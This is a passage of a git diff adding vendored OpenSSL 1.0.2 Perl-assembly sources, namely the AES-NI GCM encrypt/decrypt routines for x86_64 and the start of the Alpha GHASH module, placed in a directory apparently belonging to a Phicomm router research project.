+	 vpaddb		$T2,$T1,$Ii
+	mov		%r13,0x70+8(%rsp)
+	lea		0x60($inp),$inp
+	  vaesenclast	$Z1,$inout2,$inout2
+	 vpaddb		$T2,$Ii,$Z1
+	mov		%r12,0x78+8(%rsp)
+	lea		0x60($out),$out
+	  vmovdqu	0x00-0x80($key),$rndkey
+	  vaesenclast	$Z2,$inout3,$inout3
+	 vpaddb		$T2,$Z1,$Z2
+	  vaesenclast	$Z3, $inout4,$inout4
+	 vpaddb		$T2,$Z2,$Z3
+	  vaesenclast	$Hkey,$inout5,$inout5
+	 vpaddb		$T2,$Z3,$Hkey
+
+	add		\$0x60,$ret
+	sub		\$0x6,$len
+	jc		.L6x_done
+
+	  vmovups	$inout0,-0x60($out)	# save output
+	 vpxor		$rndkey,$T1,$inout0
+	  vmovups	$inout1,-0x50($out)
+	 vmovdqa	$Ii,$inout1		# 0 latency
+	  vmovups	$inout2,-0x40($out)
+	 vmovdqa	$Z1,$inout2		# 0 latency
+	  vmovups	$inout3,-0x30($out)
+	 vmovdqa	$Z2,$inout3		# 0 latency
+	  vmovups	$inout4,-0x20($out)
+	 vmovdqa	$Z3,$inout4		# 0 latency
+	  vmovups	$inout5,-0x10($out)
+	 vmovdqa	$Hkey,$inout5		# 0 latency
+	vmovdqu		0x20+8(%rsp),$Z3	# I[5]
+	jmp		.Loop6x
+
+.L6x_done:
+	vpxor		16+8(%rsp),$Xi,$Xi	# modulo-scheduled
+	vpxor		$Z0,$Xi,$Xi		# modulo-scheduled
+
+	ret
+.size	_aesni_ctr32_ghash_6x,.-_aesni_ctr32_ghash_6x
+___
+######################################################################
+#
+# size_t aesni_gcm_[en|de]crypt(const void *inp, void *out, size_t len,
+#		const AES_KEY *key, unsigned char iv[16],
+#		struct { u128 Xi,H,Htbl[9]; } *Xip);
+$code.=<<___;
+.globl	aesni_gcm_decrypt
+.type	aesni_gcm_decrypt,\@function,6
+.align	32
+aesni_gcm_decrypt:
+	xor	$ret,$ret
+	cmp	\$0x60,$len			# minimal accepted length
+	jb	.Lgcm_dec_abort
+
+	lea	(%rsp),%rax			# save stack pointer
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+___
+$code.=<<___ if ($win64);
+	lea	-0xa8(%rsp),%rsp
+	movaps	%xmm6,-0xd8(%rax)
+	movaps	%xmm7,-0xc8(%rax)
+	movaps	%xmm8,-0xb8(%rax)
+	movaps	%xmm9,-0xa8(%rax)
+	movaps	%xmm10,-0x98(%rax)
+	movaps	%xmm11,-0x88(%rax)
+	movaps	%xmm12,-0x78(%rax)
+	movaps	%xmm13,-0x68(%rax)
+	movaps	%xmm14,-0x58(%rax)
+	movaps	%xmm15,-0x48(%rax)
+.Lgcm_dec_body:
+___
+$code.=<<___;
+	vzeroupper
+
+	vmovdqu		($ivp),$T1		# input counter value
+	add		\$-128,%rsp
+	mov		12($ivp),$counter
+	lea		.Lbswap_mask(%rip),$const
+	lea		-0x80($key),$in0	# borrow $in0
+	mov		\$0xf80,$end0		# borrow $end0
+	vmovdqu		($Xip),$Xi		# load Xi
+	and		\$-128,%rsp		# ensure stack alignment
+	vmovdqu		($const),$Ii		# borrow $Ii for .Lbswap_mask
+	lea		0x80($key),$key		# size optimization
+	lea		0x20+0x20($Xip),$Xip	# size optimization
+	mov		0xf0-0x80($key),$rounds
+	vpshufb		$Ii,$Xi,$Xi
+
+	and		$end0,$in0
+	and		%rsp,$end0
+	sub		$in0,$end0
+	jc		.Ldec_no_key_aliasing
+	cmp		\$768,$end0
+	jnc		.Ldec_no_key_aliasing
+	sub		$end0,%rsp		# avoid aliasing with key
+.Ldec_no_key_aliasing:
+
+	vmovdqu		0x50($inp),$Z3		# I[5]
+	lea		($inp),$in0
+	vmovdqu		0x40($inp),$Z0
+	lea		-0xc0($inp,$len),$end0
+	vmovdqu		0x30($inp),$Z1
+	shr		\$4,$len
+	xor		$ret,$ret
+	vmovdqu		0x20($inp),$Z2
+	 vpshufb	$Ii,$Z3,$Z3		# passed to _aesni_ctr32_ghash_6x
+	vmovdqu		0x10($inp),$T2
+	 vpshufb	$Ii,$Z0,$Z0
+	vmovdqu		($inp),$Hkey
+	 vpshufb	$Ii,$Z1,$Z1
+	vmovdqu		$Z0,0x30(%rsp)
+	 vpshufb	$Ii,$Z2,$Z2
+	vmovdqu		$Z1,0x40(%rsp)
+	 vpshufb	$Ii,$T2,$T2
+	vmovdqu		$Z2,0x50(%rsp)
+	 vpshufb	$Ii,$Hkey,$Hkey
+	vmovdqu		$T2,0x60(%rsp)
+	vmovdqu		$Hkey,0x70(%rsp)
+
+	call		_aesni_ctr32_ghash_6x
+
+	vmovups		$inout0,-0x60($out)	# save output
+	vmovups		$inout1,-0x50($out)
+	vmovups		$inout2,-0x40($out)
+	vmovups		$inout3,-0x30($out)
+	vmovups		$inout4,-0x20($out)
+	vmovups		$inout5,-0x10($out)
+
+	vpshufb		($const),$Xi,$Xi	# .Lbswap_mask
+	vmovdqu		$Xi,-0x40($Xip)		# output Xi
+
+	vzeroupper
+___
+$code.=<<___ if ($win64);
+	movaps	-0xd8(%rax),%xmm6
+	movaps	-0xd8(%rax),%xmm7
+	movaps	-0xb8(%rax),%xmm8
+	movaps	-0xa8(%rax),%xmm9
+	movaps	-0x98(%rax),%xmm10
+	movaps	-0x88(%rax),%xmm11
+	movaps	-0x78(%rax),%xmm12
+	movaps	-0x68(%rax),%xmm13
+	movaps	-0x58(%rax),%xmm14
+	movaps	-0x48(%rax),%xmm15
+___
+$code.=<<___;
+	mov	-48(%rax),%r15
+	mov	-40(%rax),%r14
+	mov	-32(%rax),%r13
+	mov	-24(%rax),%r12
+	mov	-16(%rax),%rbp
+	mov	-8(%rax),%rbx
+	lea	(%rax),%rsp		# restore %rsp
+.Lgcm_dec_abort:
+	mov	$ret,%rax		# return value
+	ret
+.size	aesni_gcm_decrypt,.-aesni_gcm_decrypt
+___
+
+$code.=<<___;
+.type	_aesni_ctr32_6x,\@abi-omnipotent
+.align	32
+_aesni_ctr32_6x:
+	vmovdqu		0x00-0x80($key),$Z0	# borrow $Z0 for $rndkey
+	vmovdqu		0x20($const),$T2	# borrow $T2, .Lone_msb
+	lea		-1($rounds),%r13
+	vmovups		0x10-0x80($key),$rndkey
+	lea		0x20-0x80($key),%r12
+	vpxor		$Z0,$T1,$inout0
+	add		\$`6<<24`,$counter
+	jc		.Lhandle_ctr32_2
+	vpaddb		$T2,$T1,$inout1
+	vpaddb		$T2,$inout1,$inout2
+	vpxor		$Z0,$inout1,$inout1
+	vpaddb		$T2,$inout2,$inout3
+	vpxor		$Z0,$inout2,$inout2
+	vpaddb		$T2,$inout3,$inout4
+	vpxor		$Z0,$inout3,$inout3
+	vpaddb		$T2,$inout4,$inout5
+	vpxor		$Z0,$inout4,$inout4
+	vpaddb		$T2,$inout5,$T1
+	vpxor		$Z0,$inout5,$inout5
+	jmp		.Loop_ctr32
+
+.align	16
+.Loop_ctr32:
+	vaesenc		$rndkey,$inout0,$inout0
+	vaesenc		$rndkey,$inout1,$inout1
+	vaesenc		$rndkey,$inout2,$inout2
+	vaesenc		$rndkey,$inout3,$inout3
+	vaesenc		$rndkey,$inout4,$inout4
+	vaesenc		$rndkey,$inout5,$inout5
+	vmovups		(%r12),$rndkey
+	lea		0x10(%r12),%r12
+	dec		%r13d
+	jnz		.Loop_ctr32
+
+	vmovdqu		(%r12),$Hkey		# last round key
+	vaesenc		$rndkey,$inout0,$inout0
+	vpxor		0x00($inp),$Hkey,$Z0
+	vaesenc		$rndkey,$inout1,$inout1
+	vpxor		0x10($inp),$Hkey,$Z1
+	vaesenc		$rndkey,$inout2,$inout2
+	vpxor		0x20($inp),$Hkey,$Z2
+	vaesenc		$rndkey,$inout3,$inout3
+	vpxor		0x30($inp),$Hkey,$Xi
+	vaesenc		$rndkey,$inout4,$inout4
+	vpxor		0x40($inp),$Hkey,$T2
+	vaesenc		$rndkey,$inout5,$inout5
+	vpxor		0x50($inp),$Hkey,$Hkey
+	lea		0x60($inp),$inp
+
+	vaesenclast	$Z0,$inout0,$inout0
+	vaesenclast	$Z1,$inout1,$inout1
+	vaesenclast	$Z2,$inout2,$inout2
+	vaesenclast	$Xi,$inout3,$inout3
+	vaesenclast	$T2,$inout4,$inout4
+	vaesenclast	$Hkey,$inout5,$inout5
+	vmovups		$inout0,0x00($out)
+	vmovups		$inout1,0x10($out)
+	vmovups		$inout2,0x20($out)
+	vmovups		$inout3,0x30($out)
+	vmovups		$inout4,0x40($out)
+	vmovups		$inout5,0x50($out)
+	lea		0x60($out),$out
+
+	ret
+.align	32
+.Lhandle_ctr32_2:
+	vpshufb		$Ii,$T1,$Z2		# byte-swap counter
+	vmovdqu		0x30($const),$Z1	# borrow $Z1, .Ltwo_lsb
+	vpaddd		0x40($const),$Z2,$inout1	# .Lone_lsb
+	vpaddd		$Z1,$Z2,$inout2
+	vpaddd		$Z1,$inout1,$inout3
+	vpshufb		$Ii,$inout1,$inout1
+	vpaddd		$Z1,$inout2,$inout4
+	vpshufb		$Ii,$inout2,$inout2
+	vpxor		$Z0,$inout1,$inout1
+	vpaddd		$Z1,$inout3,$inout5
+	vpshufb		$Ii,$inout3,$inout3
+	vpxor		$Z0,$inout2,$inout2
+	vpaddd		$Z1,$inout4,$T1		# byte-swapped next counter value
+	vpshufb		$Ii,$inout4,$inout4
+	vpxor		$Z0,$inout3,$inout3
+	vpshufb		$Ii,$inout5,$inout5
+	vpxor		$Z0,$inout4,$inout4
+	vpshufb		$Ii,$T1,$T1		# next counter value
+	vpxor		$Z0,$inout5,$inout5
+	jmp	.Loop_ctr32
+.size	_aesni_ctr32_6x,.-_aesni_ctr32_6x
+
+.globl	aesni_gcm_encrypt
+.type	aesni_gcm_encrypt,\@function,6
+.align	32
+aesni_gcm_encrypt:
+	xor	$ret,$ret
+	cmp	\$0x60*3,$len			# minimal accepted length
+	jb	.Lgcm_enc_abort
+
+	lea	(%rsp),%rax			# save stack pointer
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+___
+$code.=<<___ if ($win64);
+	lea	-0xa8(%rsp),%rsp
+	movaps	%xmm6,-0xd8(%rax)
+	movaps	%xmm7,-0xc8(%rax)
+	movaps	%xmm8,-0xb8(%rax)
+	movaps	%xmm9,-0xa8(%rax)
+	movaps	%xmm10,-0x98(%rax)
+	movaps	%xmm11,-0x88(%rax)
+	movaps	%xmm12,-0x78(%rax)
+	movaps	%xmm13,-0x68(%rax)
+	movaps	%xmm14,-0x58(%rax)
+	movaps	%xmm15,-0x48(%rax)
+.Lgcm_enc_body:
+___
+$code.=<<___;
+	vzeroupper
+
+	vmovdqu		($ivp),$T1		# input counter value
+	add		\$-128,%rsp
+	mov		12($ivp),$counter
+	lea		.Lbswap_mask(%rip),$const
+	lea		-0x80($key),$in0	# borrow $in0
+	mov		\$0xf80,$end0		# borrow $end0
+	lea		0x80($key),$key		# size optimization
+	vmovdqu		($const),$Ii		# borrow $Ii for .Lbswap_mask
+	and		\$-128,%rsp		# ensure stack alignment
+	mov		0xf0-0x80($key),$rounds
+
+	and		$end0,$in0
+	and		%rsp,$end0
+	sub		$in0,$end0
+	jc		.Lenc_no_key_aliasing
+	cmp		\$768,$end0
+	jnc		.Lenc_no_key_aliasing
+	sub		$end0,%rsp		# avoid aliasing with key
+.Lenc_no_key_aliasing:
+
+	lea		($out),$in0
+	lea		-0xc0($out,$len),$end0
+	shr		\$4,$len
+
+	call		_aesni_ctr32_6x
+	vpshufb		$Ii,$inout0,$Xi		# save bswapped output on stack
+	vpshufb		$Ii,$inout1,$T2
+	vmovdqu		$Xi,0x70(%rsp)
+	vpshufb		$Ii,$inout2,$Z0
+	vmovdqu		$T2,0x60(%rsp)
+	vpshufb		$Ii,$inout3,$Z1
+	vmovdqu		$Z0,0x50(%rsp)
+	vpshufb		$Ii,$inout4,$Z2
+	vmovdqu		$Z1,0x40(%rsp)
+	vpshufb		$Ii,$inout5,$Z3		# passed to _aesni_ctr32_ghash_6x
+	vmovdqu		$Z2,0x30(%rsp)
+
+	call		_aesni_ctr32_6x
+
+	vmovdqu		($Xip),$Xi		# load Xi
+	lea		0x20+0x20($Xip),$Xip	# size optimization
+	sub		\$12,$len
+	mov		\$0x60*2,$ret
+	vpshufb		$Ii,$Xi,$Xi
+
+	call		_aesni_ctr32_ghash_6x
+	vmovdqu		0x20(%rsp),$Z3		# I[5]
+	 vmovdqu	($const),$Ii		# borrow $Ii for .Lbswap_mask
+	vmovdqu		0x00-0x20($Xip),$Hkey	# $Hkey^1
+	vpunpckhqdq	$Z3,$Z3,$T1
+	vmovdqu		0x20-0x20($Xip),$rndkey	# borrow $rndkey for $HK
+	 vmovups	$inout0,-0x60($out)	# save output
+	 vpshufb	$Ii,$inout0,$inout0	# but keep bswapped copy
+	vpxor		$Z3,$T1,$T1
+	 vmovups	$inout1,-0x50($out)
+	 vpshufb	$Ii,$inout1,$inout1
+	 vmovups	$inout2,-0x40($out)
+	 vpshufb	$Ii,$inout2,$inout2
+	 vmovups	$inout3,-0x30($out)
+	 vpshufb	$Ii,$inout3,$inout3
+	 vmovups	$inout4,-0x20($out)
+	 vpshufb	$Ii,$inout4,$inout4
+	 vmovups	$inout5,-0x10($out)
+	 vpshufb	$Ii,$inout5,$inout5
+	 vmovdqu	$inout0,0x10(%rsp)	# free $inout0
+___
+{ my ($HK,$T3)=($rndkey,$inout0);
+
+$code.=<<___;
+	 vmovdqu	0x30(%rsp),$Z2		# I[4]
+	 vmovdqu	0x10-0x20($Xip),$Ii	# borrow $Ii for $Hkey^2
+	 vpunpckhqdq	$Z2,$Z2,$T2
+	vpclmulqdq	\$0x00,$Hkey,$Z3,$Z1
+	 vpxor		$Z2,$T2,$T2
+	vpclmulqdq	\$0x11,$Hkey,$Z3,$Z3
+	vpclmulqdq	\$0x00,$HK,$T1,$T1
+
+	 vmovdqu	0x40(%rsp),$T3		# I[3]
+	vpclmulqdq	\$0x00,$Ii,$Z2,$Z0
+	 vmovdqu	0x30-0x20($Xip),$Hkey	# $Hkey^3
+	vpxor		$Z1,$Z0,$Z0
+	 vpunpckhqdq	$T3,$T3,$Z1
+	vpclmulqdq	\$0x11,$Ii,$Z2,$Z2
+	 vpxor		$T3,$Z1,$Z1
+	vpxor		$Z3,$Z2,$Z2
+	vpclmulqdq	\$0x10,$HK,$T2,$T2
+	 vmovdqu	0x50-0x20($Xip),$HK
+	vpxor		$T1,$T2,$T2
+
+	 vmovdqu	0x50(%rsp),$T1		# I[2]
+	vpclmulqdq	\$0x00,$Hkey,$T3,$Z3
+	 vmovdqu	0x40-0x20($Xip),$Ii	# borrow $Ii for $Hkey^4
+	vpxor		$Z0,$Z3,$Z3
+	 vpunpckhqdq	$T1,$T1,$Z0
+	vpclmulqdq	\$0x11,$Hkey,$T3,$T3
+	 vpxor		$T1,$Z0,$Z0
+	vpxor		$Z2,$T3,$T3
+	vpclmulqdq	\$0x00,$HK,$Z1,$Z1
+	vpxor		$T2,$Z1,$Z1
+
+	 vmovdqu	0x60(%rsp),$T2		# I[1]
+	vpclmulqdq	\$0x00,$Ii,$T1,$Z2
+	 vmovdqu	0x60-0x20($Xip),$Hkey	# $Hkey^5
+	vpxor		$Z3,$Z2,$Z2
+	 vpunpckhqdq	$T2,$T2,$Z3
+	vpclmulqdq	\$0x11,$Ii,$T1,$T1
+	 vpxor		$T2,$Z3,$Z3
+	vpxor		$T3,$T1,$T1
+	vpclmulqdq	\$0x10,$HK,$Z0,$Z0
+	 vmovdqu	0x80-0x20($Xip),$HK
+	vpxor		$Z1,$Z0,$Z0
+
+	 vpxor		0x70(%rsp),$Xi,$Xi	# accumulate I[0]
+	vpclmulqdq	\$0x00,$Hkey,$T2,$Z1
+	 vmovdqu	0x70-0x20($Xip),$Ii	# borrow $Ii for $Hkey^6
+	 vpunpckhqdq	$Xi,$Xi,$T3
+	vpxor		$Z2,$Z1,$Z1
+	vpclmulqdq	\$0x11,$Hkey,$T2,$T2
+	 vpxor		$Xi,$T3,$T3
+	vpxor		$T1,$T2,$T2
+	vpclmulqdq	\$0x00,$HK,$Z3,$Z3
+	vpxor		$Z0,$Z3,$Z0
+
+	vpclmulqdq	\$0x00,$Ii,$Xi,$Z2
+	 vmovdqu	0x00-0x20($Xip),$Hkey	# $Hkey^1
+	 vpunpckhqdq	$inout5,$inout5,$T1
+	vpclmulqdq	\$0x11,$Ii,$Xi,$Xi
+	 vpxor		$inout5,$T1,$T1
+	vpxor		$Z1,$Z2,$Z1
+	vpclmulqdq	\$0x10,$HK,$T3,$T3
+	 vmovdqu	0x20-0x20($Xip),$HK
+	vpxor		$T2,$Xi,$Z3
+	vpxor		$Z0,$T3,$Z2
+
+	 vmovdqu	0x10-0x20($Xip),$Ii	# borrow $Ii for $Hkey^2
+	  vpxor		$Z1,$Z3,$T3		# aggregated Karatsuba post-processing
+	vpclmulqdq	\$0x00,$Hkey,$inout5,$Z0
+	  vpxor		$T3,$Z2,$Z2
+	 vpunpckhqdq	$inout4,$inout4,$T2
+	vpclmulqdq	\$0x11,$Hkey,$inout5,$inout5
+	 vpxor		$inout4,$T2,$T2
+	  vpslldq	\$8,$Z2,$T3
+	vpclmulqdq	\$0x00,$HK,$T1,$T1
+	  vpxor		$T3,$Z1,$Xi
+	  vpsrldq	\$8,$Z2,$Z2
+	  vpxor		$Z2,$Z3,$Z3
+
+	vpclmulqdq	\$0x00,$Ii,$inout4,$Z1
+	 vmovdqu	0x30-0x20($Xip),$Hkey	# $Hkey^3
+	vpxor		$Z0,$Z1,$Z1
+	 vpunpckhqdq	$inout3,$inout3,$T3
+	vpclmulqdq	\$0x11,$Ii,$inout4,$inout4
+	 vpxor		$inout3,$T3,$T3
+	vpxor		$inout5,$inout4,$inout4
+	  vpalignr	\$8,$Xi,$Xi,$inout5	# 1st phase
+	vpclmulqdq	\$0x10,$HK,$T2,$T2
+	 vmovdqu	0x50-0x20($Xip),$HK
+	vpxor		$T1,$T2,$T2
+
+	vpclmulqdq	\$0x00,$Hkey,$inout3,$Z0
+	 vmovdqu	0x40-0x20($Xip),$Ii	# borrow $Ii for $Hkey^4
+	vpxor		$Z1,$Z0,$Z0
+	 vpunpckhqdq	$inout2,$inout2,$T1
+	vpclmulqdq	\$0x11,$Hkey,$inout3,$inout3
+	 vpxor		$inout2,$T1,$T1
+	vpxor		$inout4,$inout3,$inout3
+	  vxorps	0x10(%rsp),$Z3,$Z3	# accumulate $inout0
+	vpclmulqdq	\$0x00,$HK,$T3,$T3
+	vpxor		$T2,$T3,$T3
+
+	  vpclmulqdq	\$0x10,0x10($const),$Xi,$Xi
+	  vxorps	$inout5,$Xi,$Xi
+
+	vpclmulqdq	\$0x00,$Ii,$inout2,$Z1
+	 vmovdqu	0x60-0x20($Xip),$Hkey	# $Hkey^5
+	vpxor		$Z0,$Z1,$Z1
+	 vpunpckhqdq	$inout1,$inout1,$T2
+	vpclmulqdq	\$0x11,$Ii,$inout2,$inout2
+	 vpxor		$inout1,$T2,$T2
+	  vpalignr	\$8,$Xi,$Xi,$inout5	# 2nd phase
+	vpxor		$inout3,$inout2,$inout2
+	vpclmulqdq	\$0x10,$HK,$T1,$T1
+	 vmovdqu	0x80-0x20($Xip),$HK
+	vpxor		$T3,$T1,$T1
+
+	  vxorps	$Z3,$inout5,$inout5
+	  vpclmulqdq	\$0x10,0x10($const),$Xi,$Xi
+	  vxorps	$inout5,$Xi,$Xi
+
+	vpclmulqdq	\$0x00,$Hkey,$inout1,$Z0
+	 vmovdqu	0x70-0x20($Xip),$Ii	# borrow $Ii for $Hkey^6
+	vpxor		$Z1,$Z0,$Z0
+	 vpunpckhqdq	$Xi,$Xi,$T3
+	vpclmulqdq	\$0x11,$Hkey,$inout1,$inout1
+	 vpxor		$Xi,$T3,$T3
+	vpxor		$inout2,$inout1,$inout1
+	vpclmulqdq	\$0x00,$HK,$T2,$T2
+	vpxor		$T1,$T2,$T2
+
+	vpclmulqdq	\$0x00,$Ii,$Xi,$Z1
+	vpclmulqdq	\$0x11,$Ii,$Xi,$Z3
+	vpxor		$Z0,$Z1,$Z1
+	vpclmulqdq	\$0x10,$HK,$T3,$Z2
+	vpxor		$inout1,$Z3,$Z3
+	vpxor		$T2,$Z2,$Z2
+
+	vpxor		$Z1,$Z3,$Z0		# aggregated Karatsuba post-processing
+	vpxor		$Z0,$Z2,$Z2
+	vpslldq		\$8,$Z2,$T1
+	vmovdqu		0x10($const),$Hkey	# .Lpoly
+	vpsrldq		\$8,$Z2,$Z2
+	vpxor		$T1,$Z1,$Xi
+	vpxor		$Z2,$Z3,$Z3
+
+	vpalignr	\$8,$Xi,$Xi,$T2		# 1st phase
+	vpclmulqdq	\$0x10,$Hkey,$Xi,$Xi
+	vpxor		$T2,$Xi,$Xi
+
+	vpalignr	\$8,$Xi,$Xi,$T2		# 2nd phase
+	vpclmulqdq	\$0x10,$Hkey,$Xi,$Xi
+	vpxor		$Z3,$T2,$T2
+	vpxor		$T2,$Xi,$Xi
+___
+}
+$code.=<<___;
+	vpshufb		($const),$Xi,$Xi	# .Lbswap_mask
+	vmovdqu		$Xi,-0x40($Xip)		# output Xi
+
+	vzeroupper
+___
+$code.=<<___ if ($win64);
+	movaps	-0xd8(%rax),%xmm6
+	movaps	-0xc8(%rax),%xmm7
+	movaps	-0xb8(%rax),%xmm8
+	movaps	-0xa8(%rax),%xmm9
+	movaps	-0x98(%rax),%xmm10
+	movaps	-0x88(%rax),%xmm11
+	movaps	-0x78(%rax),%xmm12
+	movaps	-0x68(%rax),%xmm13
+	movaps	-0x58(%rax),%xmm14
+	movaps	-0x48(%rax),%xmm15
+___
+$code.=<<___;
+	mov	-48(%rax),%r15
+	mov	-40(%rax),%r14
+	mov	-32(%rax),%r13
+	mov	-24(%rax),%r12
+	mov	-16(%rax),%rbp
+	mov	-8(%rax),%rbx
+	lea	(%rax),%rsp		# restore %rsp
+.Lgcm_enc_abort:
+	mov	$ret,%rax		# return value
+	ret
+.size	aesni_gcm_encrypt,.-aesni_gcm_encrypt
+___
+
+$code.=<<___;
+.align	64
+.Lbswap_mask:
+	.byte	15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,0
+.Lpoly:
+	.byte	0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0xc2
+.Lone_msb:
+	.byte	0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1
+.Ltwo_lsb:
+	.byte	2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
+.Lone_lsb:
+	.byte	1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
+.asciz	"AES-NI GCM module for x86_64, CRYPTOGAMS by <appro\@openssl.org>"
+.align	64
+___
+if ($win64) {
+$rec="%rcx";
+$frame="%rdx";
+$context="%r8";
+$disp="%r9";
+
+$code.=<<___
+.extern	__imp_RtlVirtualUnwind
+.type	gcm_se_handler,\@abi-omnipotent
+.align	16
+gcm_se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HandlerData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# prologue label
+	cmp	%r10,%rbx		# context->Rip<prologue label
+	jb	.Lcommon_seh_tail
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=epilogue label
+	jae	.Lcommon_seh_tail
+
+	mov	120($context),%rax	# pull context->Rax
+
+	mov	-48(%rax),%r15
+	mov	-40(%rax),%r14
+	mov	-32(%rax),%r13
+	mov	-24(%rax),%r12
+	mov	-16(%rax),%rbp
+	mov	-8(%rax),%rbx
+	mov	%r15,240($context)
+	mov	%r14,232($context)
+	mov	%r13,224($context)
+	mov	%r12,216($context)
+	mov	%rbp,160($context)
+	mov	%rbx,144($context)
+
+	lea	-0xd8(%rax),%rsi	# %xmm save area
+	lea	512($context),%rdi	# & context.Xmm6
+	mov	\$20,%ecx		# 10*sizeof(%xmm0)/sizeof(%rax)
+	.long	0xa548f3fc		# cld; rep movsq
+
+.Lcommon_seh_tail:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$154,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	gcm_se_handler,.-gcm_se_handler
+
+.section	.pdata
+.align	4
+	.rva	.LSEH_begin_aesni_gcm_decrypt
+	.rva	.LSEH_end_aesni_gcm_decrypt
+	.rva	.LSEH_gcm_dec_info
+
+	.rva	.LSEH_begin_aesni_gcm_encrypt
+	.rva	.LSEH_end_aesni_gcm_encrypt
+	.rva	.LSEH_gcm_enc_info
+.section	.xdata
+.align	8
+.LSEH_gcm_dec_info:
+	.byte	9,0,0,0
+	.rva	gcm_se_handler
+	.rva	.Lgcm_dec_body,.Lgcm_dec_abort
+.LSEH_gcm_enc_info:
+	.byte	9,0,0,0
+	.rva	gcm_se_handler
+	.rva	.Lgcm_enc_body,.Lgcm_enc_abort
+___
+}
+}}} else {{{
+$code=<<___;	# assembler is too old
+.text
+
+.globl	aesni_gcm_encrypt
+.type	aesni_gcm_encrypt,\@abi-omnipotent
+aesni_gcm_encrypt:
+	xor	%eax,%eax
+	ret
+.size	aesni_gcm_encrypt,.-aesni_gcm_encrypt
+
+.globl	aesni_gcm_decrypt
+.type	aesni_gcm_decrypt,\@abi-omnipotent
+aesni_gcm_decrypt:
+	xor	%eax,%eax
+	ret
+.size	aesni_gcm_decrypt,.-aesni_gcm_decrypt
+___
+}}}
+
+$code =~ s/\`([^\`]*)\`/eval($1)/gem;
+
+print $code;
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-alpha.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-alpha.pl
new file mode 100644
index 0000000..aa36029
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-alpha.pl
@@ -0,0 +1,460 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# March 2010
+#
+# The module implements "4-bit" GCM GHASH function and underlying
+# single multiplication operation in GF(2^128). "4-bit" means that it
+# uses 256 bytes per-key table [+128 bytes shared table]. Even though
+# loops are aggressively modulo-scheduled in respect to references to
+# Htbl and Z.hi updates for 8 cycles per byte, measured performance is
+# ~12 cycles per processed byte on 21264 CPU. It seems to be a dynamic
+# scheduling "glitch," because uprofile(1) indicates uniform sample
+# distribution, as if all instruction bundles execute in 1.5 cycles.
+# Meaning that it could have been even faster, yet 12 cycles is ~60%
+# better than gcc-generated code and ~80% than code generated by vendor
+# compiler.
+
+$cnt="v0";	# $0
+$t0="t0";
+$t1="t1";
+$t2="t2";
+$Thi0="t3";	# $4
+$Tlo0="t4";
+$Thi1="t5";
+$Tlo1="t6";
+$rem="t7";	# $8
+#################
+$Xi="a0";	# $16, input argument block
+$Htbl="a1";
+$inp="a2";
+$len="a3";
+$nlo="a4";	# $20
+$nhi="a5";
+$Zhi="t8";
+$Zlo="t9";
+$Xhi="t10";	# $24
+$Xlo="t11";
+$remp="t12";
+$rem_4bit="AT";	# $28
+
+{ my $N;
+  sub loop() {
+
+	$N++;
+$code.=<<___;
+.align	4
+	extbl	$Xlo,7,$nlo
+	and	$nlo,0xf0,$nhi
+	sll	$nlo,4,$nlo
+	and	$nlo,0xf0,$nlo
+
+	addq	$nlo,$Htbl,$nlo
+	ldq	$Zlo,8($nlo)
+	addq	$nhi,$Htbl,$nhi
+	ldq	$Zhi,0($nlo)
+
+	and	$Zlo,0x0f,$remp
+	sll	$Zhi,60,$t0
+	lda	$cnt,6(zero)
+	extbl	$Xlo,6,$nlo
+
+	ldq	$Tlo1,8($nhi)
+	s8addq	$remp,$rem_4bit,$remp
+	ldq	$Thi1,0($nhi)
